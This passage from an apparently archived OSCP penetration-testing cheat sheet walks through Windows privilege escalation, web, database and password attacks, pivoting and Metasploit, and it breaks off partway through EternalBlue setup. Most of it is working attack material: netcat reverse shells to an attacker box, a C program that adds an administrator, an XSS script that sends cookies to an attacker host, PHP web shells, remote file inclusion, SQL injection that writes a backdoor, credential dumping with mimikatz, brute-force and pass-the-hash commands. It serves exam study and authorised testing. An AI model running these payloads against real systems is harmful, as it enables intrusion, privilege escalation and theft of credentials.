c:\Inetpub>churrasco churrasco /churrasco/-->Usage: Churrasco.exe [-d] "command to run" c:\Inetpub>churrasco -d "net user /add <username> <password>" c:\Inetpub>churrasco -d "net localgroup administrators <username> /add" c:\Inetpub>churrasco -d "NET LOCALGROUP "Remote Desktop Users" <username> /ADD" * Windows MS11-080 - [http://www.exploit-db.com/exploits/18176/](http://web.archive.org/web/20171113221652/http://www.exploit-db.com/exploits/18176/) python pyinstaller.py --onefile ms11-080.py mx11-080.exe -O XP * Powershell Exploits - You may find that some Windows privledge escalation exploits are written in Powershell. You may not have an interactive shell that allows you to enter the powershell prompt. Once the powershell script is uploaded to the server, here is a quick one liner to run a powershell command from a basic (cmd.exe) shell: MS16-032 [https://www.exploit-db.com/exploits/39719/](http://web.archive.org/web/20171113221652/https://www.exploit-db.com/exploits/39719/) `powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-MS16-032 }"` * Powershell Priv Escalation Tools [https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc](http://web.archive.org/web/20171113221652/https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc) * Windows Run As - Switching users in linux is trival with the `SU` command. However, an equivalent command does not exist in Windows. Here are 3 ways to run a command as a different user in Windows. * Sysinternals psexec is a handy tool for running a command on a remote or local server as a specific user, given you have thier username and password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Psexec (on a 64 bit system). C:\>psexec64 \\COMPUTERNAME -u Test -p test -h "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe" PsExec v2.2 - Execute processes remotely Copyright (C) 2001-2016 Mark Russinovich Sysinternals - www.sysinternals.com * Runas.exe is a handy windows tool that allows you to run a program as another user so long as you know thier password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Runas.exe: C:\>C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe" Enter the password for Test: Attempting to start nc.exe as user "COMPUTERNAME\Test" ... * PowerShell can also be used to launch a process as another user. The following simple powershell script will run a reverse shell as the specified username and password. $username = '<username here>' $password = '<password here>' $securePassword = ConvertTo-SecureString $password -AsPlainText -Force $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword Start-Process -FilePath C:\Users\Public\nc.exe -NoNewWindow -Credential $credential -ArgumentList ("-nc","192.168.1.10","4444","-e","cmd.exe") -WorkingDirectory C:\Users\Public Next run this script using powershell.exe: `powershell -ExecutionPolicy ByPass -command "& { . C:\Users\public\PowerShellRunAs.ps1; }"` * Windows Service Configuration Viewer - Check for misconfigurations in services that can lead to privilege escalation. You can replace the executable with your own and have windows execute whatever code you want as the privileged user. icacls scsiaccess.exe scsiaccess.exe NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) Everyone:(I)(F) * Compile a custom add user command in windows using C root@kali:~# cat useradd.c #include <stdlib.h> /* system, NULL, EXIT_FAILURE */ int main () { int i; i=system ("net localgroup administrators low /add"); return 0; } `i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c` * Group Policy Preferences (GPP) A common useful misconfiguration found in modern domain environments is unprotected Windows GPP settings files * map the Domain controller SYSVOL share `net use z:\\dc01\SYSVOL` * Find the GPP file: Groups.xml `dir /s Groups.xml` * Review the contents for passwords `type Groups.xml` * Decrypt using GPP Decrypt `gpp-decrypt riBZpPtHOGtVk+SdLOmJ6xiNgFH6Gp45BoP3I6AnPgZ1IfxtgI67qqZfgh78kBZB` * Find and display the proof.txt or flag.txt - get the loot! `#meterpreter > run post/windows/gather/win_privs` `cd\ & dir /b /s proof.txt` `type c:\pathto\proof.txt` # [](#client-web-and-password-attacks)Client, Web and Password Attacks * ## [](#client-attacks)Client Attacks * MS12-037- Internet Explorer 8 Fixed Col Span ID wget -O exploit.html [http://www.exploit-db.com/download/24017](http://web.archive.org/web/20171113221652/http://www.exploit-db.com/download/24017) service apache2 start * JAVA Signed Jar client side attack echo '' > /var/www/html/java.html User must hit run on the popup that occurs. * Linux Client Shells [_http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/_](http://web.archive.org/web/20171113221652/http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/) * Setting up the Client Side Exploit * Swapping Out the Shellcode * Injecting a Backdoor Shell into Plink.exe backdoor-factory -f /usr/share/windows-binaries/plink.exe -H $ip -P 4444 -s reverse_shell_tcp * ## [](#web-attacks)Web Attacks * Web Shag Web Application Vulnerability Assessment Platform webshag-gui * Web Shells [_http://tools.kali.org/maintaining-access/webshells_](http://web.archive.org/web/20171113221652/http://tools.kali.org/maintaining-access/webshells) `ls -l /usr/share/webshells/` * Generate a PHP backdoor (generate) protected with the given password (s3cr3t) weevely generate s3cr3t weevely http://$ip/weevely.php s3cr3t * Java Signed Applet Attack * HTTP / HTTPS Webserver Enumeration * OWASP Dirbuster * nikto -h $ip * Essential Iceweasel Add-ons Cookies Manager [https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/](http://web.archive.org/web/20171113221652/https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/) Tamper Data [https://addons.mozilla.org/en-US/firefox/addon/tamper-data/](http://web.archive.org/web/20171113221652/https://addons.mozilla.org/en-US/firefox/addon/tamper-data/) * Cross Site Scripting (XSS) significant impacts, such as cookie stealing and authentication bypass, redirecting the victim’s browser to a malicious HTML page, and more * Browser Redirection and IFRAME Injection <div class="highlight highlight-text-html-basic"> <pre><<span class="pl-ent">iframe</span> <span class="pl-e">SRC</span>=<span class="pl-s"><span class="pl-pds">"</span>http://$ip/report<span class="pl-pds">"</span></span> <span class="pl-e">height</span> = <span class="pl-s"><span class="pl-pds">"</span>0<span class="pl-pds">"</span></span> <span class="pl-e">width</span>=<span class="pl-s"><span class="pl-pds">"</span>0<span class="pl-pds">"</span></span>></<span class="pl-ent">iframe</span>></pre> </div> * Stealing Cookies and Session Information <div class="highlight highlight-source-js"> <pre><span class="pl-k"><</span>javascript<span class="pl-k">></span> <span class="pl-k">new</span> <span class="pl-en">image</span>().<span class="pl-smi">src</span><span class="pl-k">=</span><span class="pl-s"><span class="pl-pds">"</span>http://$ip/bogus.php?output=<span class="pl-pds">"</span></span><span class="pl-k">+</span><span class="pl-c1">document</span>.<span class="pl-c1">cookie</span>; <span class="pl-k"><</span><span class="pl-k">/</span>script<span class="pl-k">></span></pre> </div> nc -nlvp 80 * ## [](#file-inclusion-vulnerabilities)File Inclusion Vulnerabilities * Local (LFI) and remote (RFI) file inclusion vulnerabilities are commonly found in poorly written PHP code. * fimap - There is a Python tool called fimap which can be leveraged to automate the exploitation of LFI/RFI vulnerabilities that are found in PHP (sqlmap for LFI): [_https://github.com/kurobeats/fimap_](http://web.archive.org/web/20171113221652/https://github.com/kurobeats/fimap) * Gaining a shell from phpinfo() fimap + phpinfo() Exploit - If a phpinfo() file is present, it’s usually possible to get a shell, if you don’t know the location of the phpinfo file fimap can probe for it, or you could use a tool like OWASP DirBuster. * For Local File Inclusions look for the include() function in PHP code. <div class="highlight highlight-text-html-php"> <pre><span class="pl-s1"><span class="pl-k">include</span>(<span class="pl-s"><span class="pl-pds">"</span>lang/<span class="pl-pds">"</span></span><span class="pl-k">.</span><span class="pl-smi">$_COOKIE</span>[<span class="pl-s"><span class="pl-pds">'</span>lang<span class="pl-pds">'</span></span>]);</span> <span class="pl-s1"><span class="pl-k">include</span>(<span class="pl-smi">$_GET</span>[<span class="pl-s"><span class="pl-pds">'</span>page<span class="pl-pds">'</span></span>]<span class="pl-k">.</span><span class="pl-s"><span class="pl-pds">"</span>.php<span class="pl-pds">"</span></span>);</span></pre> </div> * LFI - Encode and Decode a file using base64 <div class="highlight highlight-source-shell"> <pre>curl -s \ <span class="pl-s"><span class="pl-pds">"</span>http://<span class="pl-smi">$ip</span>/?page=php://filter/convert.base64-encode/resource=index<span class="pl-pds">"</span></span> \ <span class="pl-k">|</span> grep -e <span class="pl-s"><span class="pl-pds">'</span>\[^\\ \]\\{40,\\}<span class="pl-pds">'</span></span> <span class="pl-k">|</span> base64 -d</pre> </div> * LFI - Download file with base 64 encoding _http://$ip/index.php?page=php://filter/convert.base64-encode/resource=admin.php_ * LFI Linux Files: /etc/issue /proc/version /etc/profile /etc/passwd /etc/passwd /etc/shadow /root/.bash_history /var/log/dmessage /var/mail/root /var/spool/cron/crontabs/root * LFI Windows Files: %SYSTEMROOT%\repair\system %SYSTEMROOT%\repair\SAM %SYSTEMROOT%\repair\SAM %WINDIR%\win.ini %SYSTEMDRIVE%\boot.ini %WINDIR%\Panther\sysprep.inf %WINDIR%\system32\config\AppEvent.Evt * LFI OSX Files: /etc/fstab /etc/master.passwd /etc/resolv.conf /etc/sudoers /etc/sysctl.conf * LFI - Download passwords file _http://$ip/index.php?page=/etc/passwd_ _http://$ip/index.php?file=../../../../etc/passwd_ * LFI - Download passwords file with filter evasion _http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd_ * Local File Inclusion - In versions of PHP below 5.3 we can terminate with null byte GET /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00 * Contaminating Log Files `<?php echo shell_exec($_GET['cmd']);?>` * For a Remote File Inclusion look for php code that is not sanitized and passed to the PHP include function and the php.ini file must be configured to allow remote files _/etc/php5/cgi/php.ini_ - "allow_url_fopen" and "allow_url_include" both set to "on" `include($_REQUEST["file"].".php");` * Remote File Inclusion `http://192.168.11.35/addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt` `<?php echo shell\_exec("ipconfig");?>` * ## [](#database-vulnerabilities)Database Vulnerabilities * Playing with SQL Syntax A great tool I have found for playing with SQL Syntax for a variety of database types (MSSQL Server, MySql, PostGreSql, Oracle) is SQL Fiddle: [http://sqlfiddle.com](http://web.archive.org/web/20171113221652/http://sqlfiddle.com/) Another site is rextester.com: [http://rextester.com/l/mysql_online_compiler](http://web.archive.org/web/20171113221652/http://rextester.com/l/mysql_online_compiler) * Detecting SQL Injection Vulnerabilities. Most modern automated scanner tools use time delay techniques to detect SQL injection vulnerabilities. This method can tell you if a SQL injection vulnerability is present even if it is a "blind" sql injection vulnerabilit that does not provide any data back. You know your SQL injection is working when the server takes a LOooooong time to respond. I have added a line comment at the end of each injection statement just in case there is additional SQL code after the injection point. * **MSSQL Server SQL Injection Time Delay Detection:** Add a 30 second delay to a MSSQL Server Query * _Original Query_ `SELECT * FROM products WHERE name='Test';` * _Injection Value_ `'; WAITFOR DELAY '00:00:30'; --` * _Resulting Query_ `SELECT * FROM products WHERE name='Test'; WAITFOR DELAY '00:00:30'; --` * **MySQL Injection Time Delay Detection:** Add a 30 second delay to a MySQL Query * _Original Query_ `SELECT * FROM products WHERE name='Test';` * _Injection Value_ `'-SLEEP(30); #` * _Resulting Query_ `SELECT * FROM products WHERE name='Test'-SLEEP(30); #` * **PostGreSQL Injection Time Delay Detection:** Add a 30 second delay to an PostGreSQL Query * _Original Query_ `SELECT * FROM products WHERE name='Test';` * _Injection Value_ `'; SELECT pg_sleep(30); --` * _Resulting Query_ `SELECT * FROM products WHERE name='Test'; SELECT pg_sleep(30); --` * Grab password hashes from a web application mysql database called “Users” - once you have the MySQL root username and password mysql -u root -p -h $ip use "Users" show tables; select \* from users; * Authentication Bypass name='wronguser' or 1=1; name='wronguser' or 1=1 LIMIT 1; * Enumerating the Database `http://192.168.11.35/comment.php?id=738)'` Verbose error message? `http://$ip/comment.php?id=738 order by 1` `http://$ip/comment.php?id=738 union all select 1,2,3,4,5,6` Determine MySQL Version: `http://$ip/comment.php?id=738 union all select 1,2,3,4,@@version,6` Current user being used for the database connection: `http://$ip/comment.php?id=738 union all select 1,2,3,4,user(),6` Enumerate database tables and column structures `http://$ip/comment.php?id=738 union all select 1,2,3,4,table_name,6 FROM information_schema.tables` Target the users table in the database `http://$ip/comment.php?id=738 union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users'` Extract the name and password `http://$ip/comment.php?id=738 union select 1,2,3,4,concat(name,0x3a, password),6 FROM users` Create a backdoor `http://$ip/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'` * **SQLMap Examples** * Crawl the links `sqlmap -u http://$ip --crawl=1` `sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3` * SQLMap Search for databases against a suspected GET SQL Injection `sqlmap –u http://$ip/blog/index.php?search –dbs` * SQLMap dump tables from database oscommerce at GET SQL injection `sqlmap –u http://$ip/blog/index.php?search= –dbs –D oscommerce –tables –dumps` * SQLMap GET Parameter command `sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --dump -threads=5` * SQLMap Post Username parameter `sqlmap -u http://$ip/login.php --method=POST --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --dump-all` * SQL Map OS Shell `sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --osshell` `sqlmap -u http://$ip/login.php --method=POST --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --os-shell` * Automated sqlmap scan `sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php"` * Targeted sqlmap scan `sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump` * Scan url for union + error based injection with mysql backend and use a random user agent + database dump `sqlmap -o -u http://$ip/index.php --forms --dbs` `sqlmap -o -u "http://$ip/form/" --forms` * Sqlmap check form for injection `sqlmap -o -u "http://$ip/vuln-form" --forms -D database-name -T users --dump` * Enumerate databases `sqlmap --dbms=mysql -u "$URL" --dbs` * Enumerate tables from a specific database `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables` * Dump table data from a specific database and table `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump` * Specify parameter to exploit `sqlmap --dbms=mysql -u "http://www.example.com/param1=value1&param2=value2" --dbs -p param2` * Specify parameter to exploit in 'nice' URIs (exploits param1) `sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs` * Get OS shell `sqlmap --dbms=mysql -u "$URL" --os-shell` * Get SQL shell `sqlmap --dbms=mysql -u "$URL" --sql-shell` * SQL query `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"` * Use Tor Socks5 proxy `sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs` * **NoSQLMap Examples** You may encounter NoSQL instances like MongoDB in your OSCP journies (`/cgi-bin/mongo/2.2.3/dbparse.py`). NoSQLMap can help you to automate NoSQLDatabase enumeration. * NoSQLMap Installation <div class="highlight highlight-source-shell"> <pre>git clone https://github.com/codingo/NoSQLMap.git <span class="pl-c1">cd</span> NoSQLMap/ ls pip install couchdb pip install pbkdf2 pip install ipcalc python nosqlmap.py</pre> </div> * Often you can create an exception dump message with MongoDB using a malformed NoSQLQuery such as: `a'; return this.a != 'BadData’'; var dummy='!` * ## [](#password-attacks)Password Attacks * AES Decryption [http://aesencryption.net/](http://web.archive.org/web/20171113221652/http://aesencryption.net/) * Convert multiple webpages into a word list <div class="highlight highlight-source-shell"> <pre><span class="pl-k">for</span> <span class="pl-smi">x</span> <span class="pl-k">in</span> <span class="pl-s"><span class="pl-pds">'</span>index<span class="pl-pds">'</span></span> <span class="pl-s"><span class="pl-pds">'</span>about<span class="pl-pds">'</span></span> <span class="pl-s"><span class="pl-pds">'</span>post<span class="pl-pds">'</span></span> <span class="pl-s"><span class="pl-pds">'</span>contact<span class="pl-pds">'</span></span> <span class="pl-k">;</span> <span class="pl-k">do</span> \ curl http://<span class="pl-smi">$ip</span>/<span class="pl-smi">$x</span>.html <span class="pl-k">|</span> html2markdown <span class="pl-k">|</span> tr -s <span class="pl-s"><span class="pl-pds">'</span> <span class="pl-pds">'</span></span> <span class="pl-s"><span class="pl-pds">'</span>\\n<span class="pl-pds">'</span></span> <span class="pl-k">>></span> webapp.txt <span class="pl-k">;</span> \ <span class="pl-k">done</span></pre> </div> * Or convert html to word list dict `html2dic index.html.out | sort -u > index-html.dict` * Default Usernames and Passwords * CIRT [_http://www.cirt.net/passwords_](http://web.archive.org/web/20171113221652/http://www.cirt.net/passwords) * Government Security - Default Logins and Passwords for Networked Devices * [_http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php_](http://web.archive.org/web/20171113221652/http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php) * Virus.org [_http://www.virus.org/default-password/_](http://web.archive.org/web/20171113221652/http://www.virus.org/default-password/) * Default Password [_http://www.defaultpassword.com/_](http://web.archive.org/web/20171113221652/http://www.defaultpassword.com/) * Brute Force * Nmap Brute forcing Scripts [_https://nmap.org/nsedoc/categories/brute.html_](http://web.archive.org/web/20171113221652/https://nmap.org/nsedoc/categories/brute.html) * Nmap Generic auto detect brute force attack: `nmap --script brute -Pn <target.com or ip>` * MySQL nmap brute force attack: `nmap --script=mysql-brute $ip` * Dictionary Files * Word lists on Kali `cd /usr/share/wordlists` * Key-space Brute Force * `crunch 6 6 0123456789ABCDEF -o crunch1.txt` * `crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha` * `crunch 8 8 -t ,@@^^%%%` * Pwdump and Fgdump - Security Accounts Manager (SAM) * `pwdump.exe` - attempts to extract password hashes * `fgdump.exe` - attempts to kill local antiviruses before attempting to dump the password hashes and cached credentials. * Windows Credential Editor (WCE) * allows one to perform several attacks to obtain clear text passwords and hashes. Usage: `wce -w` * Mimikatz * extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets [_https://github.com/gentilkiwi/mimikatz_](http://web.archive.org/web/20171113221652/https://github.com/gentilkiwi/mimikatz) From metasploit meterpreter (must have System level access): meterpreter> load mimikatz meterpreter> help mimikatz meterpreter> msv meterpreter> kerberos meterpreter> mimikatz_command -f samdump::hashes meterpreter> mimikatz_command -f sekurlsa::searchPasswords * Password Profiling * cewl can generate a password list from a web page `cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt` * Password Mutating * John the ripper can mutate password lists nano /etc/john/john.conf `john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt` * Medusa * Medusa, initiated against an htaccess protected web directory `medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10` * Ncrack * ncrack (from the makers of nmap) can brute force RDP `ncrack -vv --user offsec -P password-file.txt rdp://$ip` * Hydra * Hydra brute force against SNMP `hydra -P password-file.txt -v $ip snmp` * Hydra FTP known user and rockyou password list `hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp` * Hydra SSH using list of users and passwords `hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh` * Hydra SSH using a known password and a username list `hydra -v -V -u -L users.txt -p "<known password>" -t 1 -u $ip ssh` * Hydra SSH Against Known username on port 22 `hydra $ip -s 22 ssh -l <user> -P big_wordlist.txt` * Hydra POP3 Brute Force `hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V` * Hydra SMTP Brute Force `hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V` * Hydra attack http get 401 login with a dictionary `hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin` * Hydra attack Windows Remote Desktop with rockyou `hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip` * Hydra brute force SMB user with rockyou: `hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb` * Hydra brute force a Wordpress admin login `hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'` * ## [](#password-hash-attacks)Password Hash Attacks * Online Password Cracking [_https://crackstation.net/_](http://web.archive.org/web/20171113221652/https://crackstation.net/) [_http://finder.insidepro.com/_](http://web.archive.org/web/20171113221652/http://finder.insidepro.com/) * Hashcat Needed to install new drivers to get my GPU Cracking to work on the Kali linux VM and I also had to use the --force parameter. `apt-get install libhwloc-dev ocl-icd-dev ocl-icd-opencl-dev` and `apt-get install pocl-opencl-icd` Cracking Linux Hashes - /etc/shadow file 500 | md5crypt $1$, MD5(Unix) | Operating-Systems 3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems 7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems 1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems Cracking Windows Hashes 3000 | LM | Operating-Systems 1000 | NTLM | Operating-Systems Cracking Common Application Hashes 900 | MD4 | Raw Hash 0 | MD5 | Raw Hash 5100 | Half MD5 | Raw Hash 100 | SHA1 | Raw Hash 10800 | SHA-384 | Raw Hash 1400 | SHA-256 | Raw Hash 1700 | SHA-512 | Raw Hash Create a .hash file with all the hashes you want to crack puthasheshere.hash: `$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/` Hashcat example cracking Linux md5crypt passwords $1$ using rockyou: `hashcat --force -m 500 -a 0 -o found1.txt --remove puthasheshere.hash /usr/share/wordlists/rockyou.txt` Wordpress sample hash: `$P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/` Wordpress clear text: `test` Hashcat example cracking Wordpress passwords using rockyou: `hashcat --force -m 400 -a 0 -o found1.txt --remove wphash.hash /usr/share/wordlists/rockyou.txt` * Sample Hashes [_http://openwall.info/wiki/john/sample-hashes_](http://web.archive.org/web/20171113221652/http://openwall.info/wiki/john/sample-hashes) * Identify Hashes `hash-identifier` * To crack linux hashes you must first unshadow them: `unshadow passwd-file.txt shadow-file.txt` `unshadow passwd-file.txt shadow-file.txt > unshadowed.txt` * John the Ripper - Password Hash Cracking * `john $ip.pwdump` * `john --wordlist=/usr/share/wordlists/rockyou.txt hashes` * `john --rules --wordlist=/usr/share/wordlists/rockyou.txt` * `john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt` * JTR forced descrypt cracking with wordlist `john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt` * JTR forced descrypt brute force cracking `john --format=descrypt hash --show` * Passing the Hash in Windows * Use Metasploit to exploit one of the SMB servers in the labs. Dump the password hashes and attempt a pass-the-hash attack against another system: `export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896` `pth-winexe -U administrator //$ip cmd` # [](#networking-pivoting-and-tunneling)Networking, Pivoting and Tunneling * Port Forwarding - accept traffic on a given IP address and port and redirect it to a different IP address and port * `apt-get install rinetd` * `cat /etc/rinetd.conf` # bindadress bindport connectaddress connectport w.x.y.z 53 a.b.c.d 80 * SSH Local Port Forwarding: supports bi-directional communication channels * `ssh <gateway> -L <local port to listen>:<remote host>:<remote port>` * SSH Remote Port Forwarding: Suitable for popping a remote shell on an internal non routable network * `ssh <gateway> -R <remote port to bind>:<local host>:<local port>` * SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local attacking box to tunnel ALL incoming traffic to ANY host in the DMZ network on ANY PORT * `ssh -D <local proxy port> -p <remote port> <target>` * Proxychains - Perform nmap scan within a DMZ from an external computer * Create reverse SSH tunnel from Popped machine on :2222 `ssh -f -N -T -R22222:localhost:22 yourpublichost.example.com` `ssh -f -N -R 2222:<local host>:22 root@<remote host>` * Create a Dynamic application-level port forward on 8080 thru 2222 `ssh -f -N -D <local host>:8080 -p 2222 hax0r@<remote host>` * Leverage the SSH SOCKS server to perform Nmap scan on network using proxy chains `proxychains nmap --top-ports=20 -sT -Pn $ip/24` * HTTP Tunneling `nc -vvn $ip 8888` * Traffic Encapsulation - Bypassing deep packet inspection * http tunnel On server side: `sudo hts -F <server ip addr>:<port of your app> 80` On client side: `sudo htc -P <my proxy.com:proxy port> -F <port of your app> <server ip addr>:80 stunnel` * Tunnel Remote Desktop (RDP) from a Popped Windows machine to your network * Tunnel on port 22 `plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>` * Port 22 blocked? Try port 80? or 443? `plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P80` * Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel (bypass deep packet inspection) * Windows machine add required firewall rules without prompting the user * `netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes` * `netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000` * `netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080` * `netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079` * Start the http tunnel client `httptunnel_client.exe` * Create HTTP reverse shell by connecting to localhost port 3000 `plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P 3000` * VLAN Hopping * <div class="highlight highlight-source-shell"> <pre>git clone https://github.com/nccgroup/vlan-hopping.git chmod 700 frogger.sh ./frogger.sh</pre> </div> * VPN Hacking * Identify VPN servers: `./udp-protocol-scanner.pl -p ike $ip` * Scan a range for VPN servers: `./udp-protocol-scanner.pl -p ike -f ip.txt` * Use IKEForce to enumerate or dictionary attack VPN servers: `pip install pyip` `git clone https://github.com/SpiderLabs/ikeforce.git` Perform IKE VPN enumeration with IKEForce: `./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic` Bruteforce IKE VPN using IKEForce: `./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1` Use ike-scan to capture the PSK hash: <div class="highlight highlight-source-shell"> <pre>ike-scan ike-scan TARGET-IP ike-scan -A TARGET-IP ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key ike-scan –M –A –n example<span class="pl-cce">\_</span>group -P hash-file.txt TARGET-IP</pre> </div> Use psk-crack to crack the PSK hash <div class="highlight highlight-source-shell"> <pre>psk-crack hash-file.txt pskcrack psk-crack -b 5 TARGET-IPkey psk-crack -b 5 --charset=<span class="pl-s"><span class="pl-pds">"</span>01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz<span class="pl-pds">"</span></span> 192-168-207-134key psk-crack -d /path/to/dictionary-file TARGET-IP-key</pre> </div> * PPTP Hacking * Identifying PPTP, it listens on TCP: 1723 NMAP PPTP Fingerprint: `nmap –Pn -sV -p 1723 TARGET(S)` PPTP Dictionary Attack `thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst` * Port Forwarding/Redirection * PuTTY Link tunnel - SSH Tunneling * Forward remote port to local address: `plink.exe -P 22 -l root -pw "1337" -R 445:<local host>:445 <remote host>` * SSH Pivoting * SSH pivoting from one network to another: `ssh -D <local host>:1010 -p 22 user@<remote host>` * DNS Tunneling * dnscat2 supports “download” and “upload” commands for getting iles (data and programs) to and from the target machine. * Attacking Machine Installation: <div class="highlight highlight-source-shell"> <pre>apt-get update apt-get -y install ruby-dev git make g++ gem install bundler git clone https://github.com/iagox86/dnscat2.git <span class="pl-c1">cd</span> dnscat2/server bundle install</pre> </div> * Run dnscat2: ruby ./dnscat2.rb dnscat2> New session established: 1422 dnscat2> session -i 1422 * Target Machine: [_https://downloads.skullsecurity.org/dnscat2/_](http://web.archive.org/web/20171113221652/https://downloads.skullsecurity.org/dnscat2/) [_https://github.com/lukebaggett/dnscat2-powershell/_](http://web.archive.org/web/20171113221652/https://github.com/lukebaggett/dnscat2-powershell/) `dnscat --host <dnscat server ip>` # [](#the-metasploit-framework)The Metasploit Framework * See [_Metasploit Unleashed Course_](http://web.archive.org/web/20171113221652/https://www.offensive-security.com/metasploit-unleashed/) in the Essentials * Search for exploits using Metasploit GitHub framework source code: [_https://github.com/rapid7/metasploit-framework_](http://web.archive.org/web/20171113221652/https://github.com/rapid7/metasploit-framework) Translate them for use on OSCP LAB or EXAM. * Metasploit * MetaSploit requires Postfresql `systemctl start postgresql` * To enable Postgresql on startup `systemctl enable postgresql` * MSF Syntax * Start metasploit `msfconsole` `msfconsole -q` * Show help for command `show -h` * Show Auxiliary modules `show auxiliary` * Use a module use auxiliary/scanner/snmp/snmp_enum use auxiliary/scanner/http/webdav_scanner use auxiliary/scanner/smb/smb_version use auxiliary/scanner/ftp/ftp_login use exploit/windows/pop3/seattlelab_pass * Show the basic information for a module `info` * Show the configuration parameters for a module `show options` * Set options for a module set RHOSTS 192.168.1.1-254 set THREADS 10 * Run the module `run` * Execute an Exploit `exploit` * Search for a module `search type:auxiliary login` * Metasploit Database Access * Show all hosts discovered in the MSF database `hosts` * Scan for hosts and store them in the MSF database `db_nmap` * Search machines for specific ports in MSF database `services -p 443` * Leverage MSF database to scan SMB ports (auto-completed rhosts) `services -p 443 --rhosts` * Staged and Non-staged * Non-staged payload - is a payload that is sent in its entirety in one go * Staged - sent in two parts Not have enough buffer space Or need to bypass antivirus * MS 17-010 - EternalBlue * You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue). Although, not offically part of the indended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in Metasploit EternalBlue module. I found that the elevenpaths version works much more relabily. Here are the instructions to install it taken from the following YouTube video: [_https://www.youtube.com/watch?v=4OHLor9VaRI_](http://web.archive.org/web/20171113221652/https://www.youtube.com/watch?v=4OHLor9VaRI) 1. First step is to configure the Kali to work with wine 32bit dpkg --add-architecture i386 && apt-get update && apt-get install wine32 rm -r ~/.wine wine cmd.exe exit 2. Download the exploit repostory 